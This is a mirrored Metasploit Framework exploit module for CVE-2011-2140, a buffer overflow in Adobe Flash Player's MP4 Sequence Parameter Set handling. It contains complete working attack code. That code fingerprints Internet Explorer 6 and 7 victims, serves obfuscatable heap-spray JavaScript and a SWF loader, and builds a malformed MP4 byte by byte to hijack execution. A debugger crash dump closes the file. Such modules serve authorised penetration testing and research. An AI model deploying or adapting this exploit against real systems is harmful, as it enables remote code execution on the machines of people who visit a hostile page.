Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_sps.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx

18
          component.  When processing a MP4 file (specifically the Sequence Parameter Set),

19
          Flash will see if pic_order_cnt_type is equal to 1, which sets the

20
          num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in

21
          offset_for_ref_frame on the stack, which allows arbitrary remote code execution

22
          under the context of the user.  Numerous reports also indicate that this

23
          vulnerability has been exploited in the wild.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Alexander Gavrun', # RCA

28
          'Unknown',          # Abysssec, proof of concept

29
          'sinn3r'            # Metasploit

30
        ],

31
        'References' => [

32
          [ 'CVE', '2011-2140' ],

33
          [ 'OSVDB', '74439'],

34
          [ 'BID', '49083' ],

35
          [ 'ZDI', '11-276' ],

36
          [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],

37
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],

38
          [ 'URL', 'http://web.archive.org/web/20170111122134/http://0x1byte.blogspot.com:80/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ]

39
        ],

40
        'Payload' => {

41
          'BadChars' => "\x00",

42
          'StackAdjustment' => -3500

43
        },

44
        'DefaultOptions' => {

45
          'EXITFUNC' => "seh",

46
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

47
        },

48
        'Platform' => 'win',

49
        'Targets' => [

50
          [ 'Automatic', {} ],

51
          [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], # 0x5f4 = spot on

52
          [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]

53
        ],

54
        'Privileged' => false,

55
        'DisclosureDate' => '2011-08-09',

56
        'DefaultTarget' => 0,

57
        'Notes' => {

58
          'Reliability' => UNKNOWN_RELIABILITY,

59
          'Stability' => UNKNOWN_STABILITY,

60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

61
        }

62
      )

63
    )

64


65
    register_options(

66
      [

67
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])

68
      ]

69
    )

70
  end

71


72
  def get_target(agent)

73
    # If the user is already specified by the user, we'll just use that

74
    return target if target.name != 'Automatic'

75


76
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/

77
      return targets[1]

78
    elsif agent =~ /MSIE 7/

79
      return targets[2]

80
    else

81
      return nil

82
    end

83
  end

84


85
  def on_request_uri(cli, request)

86
    agent = request.headers['User-Agent']

87
    my_target = get_target(agent)

88


89
    # Avoid the attack if the victim doesn't have the same setup we're targeting

90
    if my_target.nil?

91
      print_error("Browser not supported: #{agent.to_s}")

92
      send_not_found(cli)

93
      return

94
    end

95


96
    # The SWF requests our MP4 trigger

97
    if request.uri =~ /\.mp4$/

98
      print_status("Sending MP4")

99
      send_response(cli, @mp4, { 'Content-Type' => 'video/mp4' })

100
      return

101
    end

102


103
    # The SWF request itself

104
    if request.uri =~ /\.swf$/

105
      print_status("Sending SWF")

106
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })

107
      return

108
    end

109


110
    # Redirect to a trailing slash so relative paths work properly

111
    if get_resource != "/" and not request.uri.index("#{get_resource}/")

112
      uri = get_resource + "/"

113
      send_redirect(cli, uri)

114
      return

115
    end

116


117
    # Set payload depending on target

118
    p = payload.encoded

119


120
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))

121
    js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(target.arch))

122
    randnop = rand_text_alpha(rand(100) + 1)

123


124
    js = <<-JS

125
    var heap_obj = new heapLib.ie(0x20000);

126
    var code = unescape("#{js_code}");

127
    var #{randnop} = "#{js_nops}";

128
    var nops = unescape(#{randnop});

129


130
    while (nops.length < 0x80000) nops += nops;

131
    var offset = nops.substring(0, #{my_target['Offset']});

132
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

133


134
    while (shellcode.length < 0x40000) shellcode += shellcode;

135
    var block = shellcode.substring(0, (0x7ffc0-6)/2);

136


137
    heap_obj.gc();

138


139
    for (var i=1; i < 0x300; i++) {

140
      heap_obj.alloc(block);

141
    }

142
    JS

143


144
    js = heaplib(js, { :noobfu => true })

145


146
    if datastore['OBFUSCATE']

147
      js = ::Rex::Exploitation::JSObfu.new(js)

148
      js.obfuscate(memory_sensitive: true)

149
    end

150


151
    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']

152
    mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6) + 3)}.mp4"

153
    swf_uri = Rex::Text.rand_text_alphanumeric(rand(8) + 4) + ".swf" + "?autostart=true&image=video.jpg&file=#{mp4_uri}"

154


155
    html = %Q|

156
    <html>

157
    <head>

158
    <script>

159
    #{js}

160
    </script>

161
    </head>

162
    <body>

163
    <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">

164
    <param name="movie" value="#{swf_uri}">

165
    </object>

166
    </body>

167
    </html>

168
    |

169


170
    html = html.gsub(/^ {4}/, '')

171


172
    print_status("Sending HTML")

173
    send_response(cli, html, { 'Content-Type' => 'text/html' })

174
  end

175


176
  def exploit

177
    @mp4 = create_mp4

178
    @swf = create_swf

179
    super

180
  end

181


182
  def create_swf

183
    path = ::File.join(Msf::Config.data_directory, "exploits", "mp4player.swf")

184
    fd = ::File.open(path, "rb")

185
    swf = fd.read(fd.stat.size)

186
    fd.close

187
    return swf

188
  end

189


190
  def create_mp4

191
    ftypAtom = "\x00\x00\x00\x20"                   # Size

192
    ftypAtom << "ftypisom"

193
    ftypAtom << "\x00\x00\x02\x00"

194
    ftypAtom << "isomiso2avc1mp41"

195


196
    mdatAtom = "\x00\x00\x00\x10"                   # Size

197
    mdatAtom << "mdat"

198
    mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"

199


200
    moovAtom1 = "\x00\x00\x08\x83"                  # Size

201
    moovAtom1 << "moov"                             # Move header box header

202
    moovAtom1 << "\x00\x00\x00"

203
    moovAtom1 << "lmvhd"                            # Type

204
    moovAtom1 << "\x00\x00\x00\x00"                 # Version/Flags

205
    moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time

206
    moovAtom1 << "\x00\x00\x03\xE8"                 # Time scale

207
    moovAtom1 << "\x00\x00\x2F\x80"                 # Duration

208
    moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

209
    moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"

210
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"

211
    moovAtom1 << "trak"                             # Track box header

212
    moovAtom1 << "\x00\x00\x00\x5C"

213
    moovAtom1 << "tkhd"

214
    moovAtom1 << "\x00\x00\x00\x0F"

215
    moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80"  # Creation time

216
    moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

217
    moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

218
    moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"

219
    moovAtom1 << "rmdia"

220
    moovAtom1 << "\x00\x00\x00\x20"                  # Size

221
    moovAtom1 << "mdhd"                              # Media header box

222
    moovAtom1 << "\x00\x00\x00\x00"                  # Version/Flags

223
    moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80"  # Creation time

224
    moovAtom1 << "\x00\x00\x00\x01"                  # Time scale

225
    moovAtom1 << "\x00\x00\x00\x0C"                  # Duration

226
    moovAtom1 << "\x55\xC4\x00\x00"

227
    moovAtom1 << "\x00\x00\x00\x2D"                  # Size

228
    moovAtom1 << "hdlr"                              # Handler Reference header

229
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"

230
    moovAtom1 << "vide"                              # Handler type

231
    moovAtom1 << "\x00\x00\x00\x00\x00"

232
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"

233
    moovAtom1 << "VideoHandler"                      # Handler name

234
    moovAtom1 << "\x00\x00\x00\x02\x1D"

235
    moovAtom1 << "minf"

236
    moovAtom1 << "\x00\x00\x00\x14"

237
    moovAtom1 << "vmhd"

238
    moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"

239
    moovAtom1 << "dinf"                              # Data information box header

240
    moovAtom1 << "\x00\x00\x00\x1c"

241
    moovAtom1 << "dref"                              # Data reference box

242
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"

243
    moovAtom1 << "\x00\x00\x00\x0C"                  # Size

244
    moovAtom1 << "url "                              # Data entry URL box

245
    moovAtom1 << "\x00\x00\x00\x01"                  # Location / version / flags

246
    moovAtom1 << "\x00\x00\x09\xDD"                  # Size

247
    moovAtom1 << "stbl"

248
    moovAtom1 << "\x00\x00\x08\x99"

249
    moovAtom1 << "stsd"

250
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"

251
    moovAtom1 << "\x00\x00\x08\x89"                  # Size

252
    moovAtom1 << "avc1"

253
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

254
    moovAtom1 << "\x01\x42"                          # Width

255
    moovAtom1 << "\x01\x42"                          # Height

256
    moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

257
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

258
    moovAtom1 << "\x18"                              # Depth

259
    moovAtom1 << "\xFF\xFF"

260
    moovAtom1 << "\x00\x00\x08\x33"                  # Size

261
    moovAtom1 << "avcC"

262
    moovAtom1 << "\x01"                              # Config version

263
    moovAtom1 << "\x64"                              # Avc profile indication

264
    moovAtom1 << "\x00"                              # Compatibility

265
    moovAtom1 << "\x15"                              # Avc level indication

266
    moovAtom1 << "\xFF\xE1"

267


268
    # Although the fields have different values, they all become 0x0c0c0c0c

269
    # in memory.

270
    cycle = "\x00\x00\x00"

271
    cycle << "\x30\x30\x30\x30"  # 6th

272
    cycle << "\x00\x00\x00"

273
    cycle << "\x18\x18\x18\x18"  # 7th

274
    cycle << "\x00\x00\x00"

275
    cycle << "\x0c\x0c\x0c\x0c"  # 8th

276
    cycle << "\x00\x00\x00"

277
    cycle << "\x06\x06\x06\x06"  # 1st

278
    cycle << "\x00\x00\x00"

279
    cycle << "\x03\x03\x03\x03"

280
    cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"

281
    cycle << "\xc0\xc0\xc0\xc0"  # 4th

282
    cycle << "\x00\x00\x00"

283
    cycle << "\x60\x60\x60\x60"

284


285
    spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"

286
    spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"

287
    spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"

288
    spsunit << cycle * 35

289
    spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"

290


291
    moovAtom2 = "\x00\x00\x00\x18"

292
    moovAtom2 << "stts"

293
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"

294
    moovAtom2 << "\x00\x00\x00\x14"

295
    moovAtom2 << "stss"

296
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"

297
    moovAtom2 << "pctts"

298
    moovAtom2 << "\x00\x00\x00\x00\x00\x00"

299
    moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"

300
    moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"

301
    moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"

302
    moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"

303
    moovAtom2 << "\x00\x00\x00\x1C"

304
    moovAtom2 << "stsc"

305
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"

306
    moovAtom2 << "\x00\x00\x00\x44"

307
    moovAtom2 << "stsz"

308
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

309
    moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"

310
    moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"

311
    moovAtom2 << "\x00\x00\x00\x40"

312
    moovAtom2 << "stco"

313
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"

314
    moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"

315


316
    moovAtom = moovAtom1 + spsunit + moovAtom2

317
    m = ftypAtom + mdatAtom + moovAtom

318
    return m

319
  end

320
end

321


322
=begin

323
C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx

324


325
Flash10u+0x5b4e8:

326
Missing image name, possible paged-out or corrupt data.

327
1f06b4e8 8901            mov     dword ptr [ecx],eax  ds:0023:020c0000=00905a4d

328
0:008> !exchain

329
020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)

330


331
ECX points to 0x0c0c0c0c at the time of the crash:

332
0:008> r

333
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000

334
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0         nv up ei pl zr na pe nc

335
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050246

336
<Unloaded_ud.drv>+0xc0c0c0b:

337
0c0c0c0c ??              ???

338


339
Example of SWF player URI:

340
http://www.jeroenwijering.com/embed/mediaplayer.swf

341


342
To-do:

343
IE 8 target

344
=end

345


346